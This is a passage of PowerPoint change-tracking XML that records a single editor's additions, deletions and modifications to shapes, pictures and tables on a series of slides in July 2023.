          <pc:sldMk cId="3670413032" sldId="1212"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:32:28.458" v="3284" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3670413032" sldId="1212"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:34:07.415" v="3317" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3670413032" sldId="1212"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:34:25.759" v="3323" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3670413032" sldId="1212"/>
            <ac:spMk id="6" creationId="{F74BACA4-CD1A-23AA-B42C-6C148DFC337E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:33:54.820" v="3313" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3670413032" sldId="1212"/>
            <ac:picMk id="4" creationId="{2A5E3CED-FDB7-D5E8-F1FF-7E53814805F9}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add replId">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:41:24.928" v="3396" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3542700489" sldId="1213"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:41:24.928" v="3396" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3542700489" sldId="1213"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:36:17.903" v="3328"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3542700489" sldId="1213"/>
            <ac:spMk id="6" creationId="{F74BACA4-CD1A-23AA-B42C-6C148DFC337E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:41:18.084" v="3391"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3542700489" sldId="1213"/>
            <ac:spMk id="7" creationId="{B80A3B81-8E3E-A89A-7147-111A6FBEB5DA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:36:10.606" v="3325"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3542700489" sldId="1213"/>
            <ac:picMk id="4" creationId="{2A5E3CED-FDB7-D5E8-F1FF-7E53814805F9}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:41:12.647" v="3388"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3542700489" sldId="1213"/>
            <ac:picMk id="8" creationId="{84A80049-B65C-6166-973F-7DE8B0EB5907}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add replId">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:42:17.961" v="3416" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2107232761" sldId="1214"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:42:17.961" v="3416" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2107232761" sldId="1214"/>
            <ac:spMk id="4" creationId="{3297F28A-E2DC-E27F-573A-C52AC74E7990}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:41:33.616" v="3397" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2107232761" sldId="1214"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:41:41.491" v="3399" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2107232761" sldId="1214"/>
            <ac:spMk id="7" creationId="{B80A3B81-8E3E-A89A-7147-111A6FBEB5DA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:42:07.430" v="3409" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2107232761" sldId="1214"/>
            <ac:picMk id="8" creationId="{84A80049-B65C-6166-973F-7DE8B0EB5907}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add replId">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:44:41.450" v="3471" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2818848384" sldId="1215"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:44:41.450" v="3471" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2818848384" sldId="1215"/>
            <ac:spMk id="4" creationId="{3297F28A-E2DC-E27F-573A-C52AC74E7990}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:43:53.011" v="3436"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2818848384" sldId="1215"/>
            <ac:spMk id="7" creationId="{B80A3B81-8E3E-A89A-7147-111A6FBEB5DA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:43:50.011" v="3435"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2818848384" sldId="1215"/>
            <ac:picMk id="8" creationId="{84A80049-B65C-6166-973F-7DE8B0EB5907}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add replId modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:52:38.043" v="3535" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3869398162" sldId="1216"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:46:59.439" v="3495" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3869398162" sldId="1216"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:52:38.043" v="3535" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3869398162" sldId="1216"/>
            <ac:spMk id="4" creationId="{3297F28A-E2DC-E27F-573A-C52AC74E7990}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add replId modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:53:17.982" v="3554" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3683914387" sldId="1217"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:52:55.669" v="3542" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3683914387" sldId="1217"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:53:17.982" v="3554" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3683914387" sldId="1217"/>
            <ac:spMk id="4" creationId="{3297F28A-E2DC-E27F-573A-C52AC74E7990}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add replId">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T22:26:50.342" v="4009"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2572576695" sldId="1218"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T22:23:13.242" v="3694" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2572576695" sldId="1218"/>
            <ac:spMk id="4" creationId="{3297F28A-E2DC-E27F-573A-C52AC74E7990}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T22:26:50.342" v="4009"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2572576695" sldId="1218"/>
            <ac:graphicFrameMk id="6" creationId="{E3199DCD-4643-49C4-379B-963C86BB28A0}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add replId">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T22:34:34.355" v="4075"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="86235200" sldId="1219"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T22:33:41.307" v="4069"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="86235200" sldId="1219"/>
            <ac:spMk id="4" creationId="{3297F28A-E2DC-E27F-573A-C52AC74E7990}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T22:34:34.355" v="4075"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="86235200" sldId="1219"/>
            <ac:graphicFrameMk id="6" creationId="{E3199DCD-4643-49C4-379B-963C86BB28A0}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add replId">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T22:37:10.500" v="4109" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2730901477" sldId="1220"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T22:37:10.500" v="4109" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2730901477" sldId="1220"/>
            <ac:spMk id="4" creationId="{10359F8A-B56A-3EB2-6C83-FB7410B44542}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T22:35:30.497" v="4077"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2730901477" sldId="1220"/>
            <ac:graphicFrameMk id="6" creationId="{E3199DCD-4643-49C4-379B-963C86BB28A0}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}"/>
    <pc:docChg chg="addSld delSld modSld">
      <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T23:28:44.549" v="2047" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T23:28:44.549" v="2047" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T23:28:44.549" v="2047" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="257"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T22:13:59.970" v="574" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="347"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T22:13:59.970" v="574" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="347"/>
            <ac:spMk id="4" creationId="{8F57D77F-0B26-F627-F82D-934E2347436E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T23:11:20.988" v="1214" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2669178660" sldId="1078"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T23:11:20.988" v="1214" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2669178660" sldId="1078"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T22:14:33.268" v="582" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1159470150" sldId="1183"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T22:14:33.268" v="582" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1159470150" sldId="1183"/>
            <ac:spMk id="4" creationId="{8F57D77F-0B26-F627-F82D-934E2347436E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T22:14:15.361" v="581"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1159470150" sldId="1183"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T23:28:19.298" v="2042" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3573718190" sldId="1192"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T23:15:33.448" v="1307" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3573718190" sldId="1192"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T23:28:19.298" v="2042" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3573718190" sldId="1192"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T23:28:24.423" v="2043"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2962076875" sldId="1193"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add replId modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:42:48.112" v="217" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="350506967" sldId="1232"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:27:32.075" v="19" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="350506967" sldId="1232"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:42:31.204" v="212" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="350506967" sldId="1232"/>
            <ac:spMk id="4" creationId="{10359F8A-B56A-3EB2-6C83-FB7410B44542}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:42:39.221" v="216" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="350506967" sldId="1232"/>
            <ac:spMk id="6" creationId="{5864AF26-9D47-D357-E812-E73655EAD214}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{F460D467-5240-8293-0E3E-FD850E4F40E2}" dt="2023-07-11T14:42:48.112" v="217" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="350506967" sldId="1232"/>
            <ac:picMk id="5" creationId="{6D2ED48C-4738-D870-2732-45C9447C6AD6}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add replId modNotes">
